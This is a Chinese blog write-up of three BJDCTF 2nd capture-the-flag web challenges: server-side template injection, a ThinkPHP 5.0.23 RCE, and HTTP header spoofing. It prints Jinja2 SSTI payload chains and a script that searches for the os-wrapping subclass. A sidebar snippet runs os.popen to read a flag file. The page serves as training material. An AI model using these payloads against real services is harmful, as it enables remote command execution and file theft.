buuoj BJDCTF-2nd WP

最新推荐文章于 2020-12-11 21:15:12 发布
最新推荐文章于 2020-12-11 21:15:12 发布
阅读量576 收藏
点赞数
分类专栏: CTF做题记录 文章标签: 安全 信息安全
会下雪的晴天
本文链接:https://blog.csdn.net/weixin_43578492/article/details/106679604
版权

复现地址:buuoj.cn

[BJDCTF 2nd]fake google

ssti的简单使用

打开复现地址是一个Google页面
在这里插入图片描述
随便搜索一下看了源码提示ssti

SSTI又叫服务端模板注入攻击
推荐先知师傅的一篇入门教程:https://xz.aliyun.com/t/3679

在这里插入图片描述
那就试试ssti能不能用吧,?name={{1-1}}下面输出却是0,说明注入是可以的
在这里插入图片描述
列出基类,?name={{"".__class__.__base__}}
在这里插入图片描述
列出其子类,?name={{"".__class__.__base__.__subclasses__()}}
在这里插入图片描述
有这么多,我们需要查找到有os类的子类,可以看到确实有一个这样的类,现在就是找到他的下标,肯定不会一个一个数鸭哈哈,写个脚本(当然也能用bp爆破),在上一条payload的后面加上[]就行,就像是找数组里面的值(?name={{"".__class__.__base__.__subclasses__()[110]}}
在这里插入图片描述

import requests
import time

for i in range(0,200):
	time.sleep(0.06)//赵师傅靶机有访问频率限制,所以加上sleep
	url = 'http://6b31caef-86aa-49f5-b819-14ec6d3637e6.node3.buuoj.cn/qaq?name={{"".__class__.__base__.__subclasses__()[%s]}}'% i
	#print(url)
	res = requests.get(url)
	if 'os._wrap_close' in res.text:
		print(url)
		break

运行后得到os类在117位,然后初始化此类(?name={{"".__class__.__base__.__subclasses__()[117].__init__.__globals__}}),用pepon执行命令,可以看到flag在根目录下,cat一下就出来了
在这里插入图片描述
在这里插入图片描述

[BJDCTF 2nd]old-hack

RCE的利用

开了靶机,黑客既视感
在这里插入图片描述
上面的THINKPHP5是一个php框架,用参数s引入一个不存在的模块爆出版本信息,然后去搜搜有没有漏洞hhh
在这里插入图片描述
直接搜5.0.23的RCE,flag在根目录下,cat一下就好
在这里插入图片描述

[BJDCTF 2nd]假猪套天下第

HTTP Header基础知识考察
这道题是Y1ng大师傅出的题,考的很基础
Y1ng师傅出题笔记:https://www.gem-love.com/ctf/2056.html#%E5%81%87%E7%8C%AA%E5%A5%97%E5%A4%A9%E4%B8%8B%E7%AC%AC%E4%B8%80
Y1ng推荐的HTTP Header 详解:https://www.cnblogs.com/jxl1996/p/10245958.html

在这里插入图片描述
admin弱口令登陆发现,但是用其他的账户随便输都能进去,进去后啥也没有,抓包看看
在这里插入图片描述
302跳转!,进去注释给的页面
在这里插入图片描述
在这里插入图片描述
没发现啥有用的,在抓包看看,cookie里面有个time参数,根据页面提示把他改到99年以后,又说我们不是来自本地的用户
在这里插入图片描述
用xff修改后(X-Forwarded-For:127.0.0.1直接加到repeater最下面就好),说我Too young too simple,那就换种方式,用Client-IP或者X-Real-IP;
然后提示访问要来自gem-love.com,用Referer:gem-love.com;
接着提示我们的浏览器不是Commodo 64,至于Commodo 64是什么自行搜索,然后用Commodore 64把UA头改了就行;
然后说邮箱不对,加上From:root@gem-love.com;
最后提示代理服务器需要是y1ng.vip,或者你可以py100一月hhh,加上via:y1ng.vip;
大功告成,解一下base64就好了
在这里插入图片描述

持续更新

会下雪的晴天
关注
专栏目录
buuoj BJDCTF 2nd rsa1
pondzhang的专栏
03-26 1014
e=12563813 p2+q2=212364140166849615900345386827373855409339975015067104662427876599237913584644325298351035312142873679076322952156014899039684112869213110216339149927308917382659025088961162906104834...
buuojweb刷题wp详解及知识整理—-【护网杯】easy_tornado(模板注入+md5)
01-20
写在前面 服务端模板注入也是一种注入攻击(简称为SSTL) 这又涉及到了本人的知识盲区 借这个题学习补充一下知识 自己走过的路加wp辅助 信息收集加思路推理 点击一下/welcome.txt 回显 render 而且url处有异常 同理测试其他选项 通过猜测可知filehash的值就是/hint.txt中的算法得到的 从而 我们只要得到cookie_secret的值即可通过脚本的到于/fllllllllllllag对应的filename的值 模板注入拿到cookie_secret get传参 ?filename=/fllllllllllllag&filehash= 回显 发现可疑参数msg
BJDCTF 2nd-WP
luoluopeach
03-23 736
Crypto 1.签到-y1ng 直接base64解码 QkpEe1czbGMwbWVfVDBfQkpEQ1RGfQ== flag:BJD{W3lc0me_T0_BJDCTF} 2.老文盲了 将文字转化为拼音可以知道文字就是flag flag:BJD{罼雧締眔擴灝淛匶襫黼瀬鎶軄鶛驕鳓哵眔鞹鰝} 3.cat_flag ...
[BJDCTF 2nd] Web复现 wp
Alexhirchi的博客
07-14 930
文章目录[BJDCTF 2nd] fake google[BJDCTF 2nd]old-hack[BJDCTF 2nd]假猪套天下第一[BJDCTF 2nd]简单注入[BJDCTF 2nd]Schrödinger[BJDCTF2020]EasySearch[BJDCTF 2nd]xss之光[BJDCTF 2nd]文件探测[BJDCTF 2nd]EasyAspDotNet [BJDCTF 2nd] fake google 要点:SSTI模板注入(python jinjia2模板) 测试网站 发现存在模板注
BJD CTF 2nd web wp
0xdawn的博客
03-25 1078
fake google 正好是前段时间学过的flask ssti,先给出payload name={{"".__class__.__mro__[1].__subclasses__()[81].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("cd ../;cat flag").read()')}} 老样子,...
BJDCTF 2nd WEB wp
hao2580的博客
04-06 285
[BJDCTF 2nd]fake google emmm,知识点:SSTI模板注入 分享一篇文章: 我垃圾直接用师傅的playload: {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %} {% for b in c.__init__.__globals__....
mikrotik_rb941-2nd_hap固件.rar
09-22
mikrotik_rb941-2nd_hap (原廠FLASH固件,用編程 器 備份出來的),測試用!
learning-jupyter-5-2nd
10-11
learning-jupyter-5-2nd 2018年版本
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
BJDCTF 2nd writeup(二)
01-21
文章目录Misc[BJDCTF 2nd]A_Beautiful_Picture[BJDCTF 2nd]小姐姐-y1ng[BJDCTF 2nd]TARGZ-y1ng[BJDCTF 2nd]Imagin – 开场曲Crypto[BJDCTF 2nd]cat_flag[BJDCTF 2nd]燕言燕语[BJDCTF 2nd]Y1nglish Misc [BJDCTF 2nd]A_Beautiful_Picture 题目: 得到的 flag 建议用 flag{} 包上提交。 解题思路: 将图片放到kali中,发现报crc错误 直接上脚本爆破,脚本如下 import zlib import stru
BJDCTF 2nd pwn Writeup
starssgo的博客
03-23 3148
博客地址 没做完…没出的题复现了补上去… r2t3 整数溢出,还是比较简单的 # -*- coding: utf-8 -* from pwn import * from LibcSearcher import * context.log_level = 'debug' context.arch = 'amd64' elf = ELF('r2t3') p = 0 def pwn(ip,port,de...
BJDCTF-writeup
夏日 の blog
03-23 1897
本篇文章为个人做题时的部分wp,如有错误,请联系我更正。 目录杂项最简单的misc-y1ngA_Beautiful_Picture小姐姐-y1ngEasyBaBa圣火昭昭-y1ngTARGZ-y1ng总结 杂项 最简单的misc-y1ng 题目是一个zip包,尝试解压出错,用AZR压缩包修复工具修复后,解压得到一个secret文件,由于没有后缀名,放入010editor查看,发现含有IHDR ...
BUUOJweb刷题wp(一)
Theseus_sky的博客
07-16 849
[HCTF 2018]WarmUp(php&代码审计) 打开source.php康康 源代码:有注释的是从其他wp上面看来的 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) /* 传入了变量page,也就是我们刚刚传进来的file */ { // 这里定义了白名单
BUUOJ-web刷题wp(二)
Theseus_sky的博客
07-16 735
特辑篇-极客大挑战2019 [极客大挑战 2019]EasySQL 万能密码如下:直接登录显示flag [极客大挑战 2019]Havefun F12看一下,发现那串注释,尝试get数据?cat=dog y1s1,这猫还是很可爱的,下面的有道题也是!!玩了半天哈哈哈 [极客大挑战 2019]Secret File 查看源代码,发现Archive.room.php,打开看看 按一下按钮 可能是跳转太快了,抓一下包。 发现提示,进入 又现提示flag.php,进入看看 网页源代码看不见,猜测是写
buuoj 部分逆向wp(持续更新
苗_的博客
08-06 806
[FlareOn3]Challenge1 点进去sub_401260() 看逻辑是base64解密,点开byte_413000发现是换表base64,直接上脚本: exp import base64 c="x2dtJEOmyjacxDemx2eczT5cVS9fVUGvWTuZWjuexjRqy24rV29q" flag="" table="ZYXABCDEFGHIJKLMNOPQRSTUVWzyxabcdefghijklmnopqrstuvw0123456789+/" table
BUUCTF-web类-[BJDCTF2020]ZJCTF,不过如此
weixin_44622228的博客
04-20 1999
BUUCTF-web类-[BJDCTF2020]ZJCTF,不过如此 分析代码,ge传入两个参数text和file,text参数利用file_get_contents()函数只读形式打开,打开后内容要与"I have a dream"字符串相匹配,才能执行下面的文件包含$file参数。 看到用的是file_get_contents()函数打开text参数,以及后面的文件包含函数,自然的想到php伪...
Buu-crypto-write up
seven749的博客
10-14 191
Buu-crypto-write up 1.password 这道题目是一道弱密码题目,通过所给信息来猜密码。key的格式后面由十位数字构成,题目给了姓名和生日,故猜测密码为zs19900315 2.Rabbit Rabbit流密码,直接采用无密钥在线解码,即可得到flag。 3.篱笆墙的影子 我们一般看到括号自然而然会想到括号前面的为flag,仔细观察前面的字符串felhaagv会发现第1,3,5,7个字母组成了flag,故想到是栅栏密码,分为两组,一组有13个字符,解密得到flag{wethinkw
BUUCTF-Crypto-老文盲了+Alice与Bob题解
weixin_47869330的博客
12-11 1372
题目: 老文盲了 罼雧締眔擴灝淛匶襫黼瀬鎶軄鶛驕鳓哵眔鞹鰝 解题: 想了一下文字加密的,只记得与佛论禅,藏头诗,看文字字形里有没有某个特殊字 (如每个字里有‘口’)的算一组 想不出什么名堂,搜搜每个字念什么,在线文字转拼音 BJD{这就是flag直接交了吧} OK fine flag:flag{淛匶襫黼瀬鎶軄鶛驕鳓哵} Alice与Bob: 题目: 解题: 根据题目:在线分解质因数: 新的数为:101999966233 再进行32位md5加密: 结果即为flag:flag{d450209323
robotics,vision and control-2nd edition
最新发布
06-28
《机器人学、视觉与控制-第2版》(Robotics, Vision and Control-2nd Edition)是一本关于机器人、视觉与控制的教材。这本书是由英国布里斯托大学的彼得·科雷尔(Peter Corke)教授撰写的。 该教材对机器人学的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值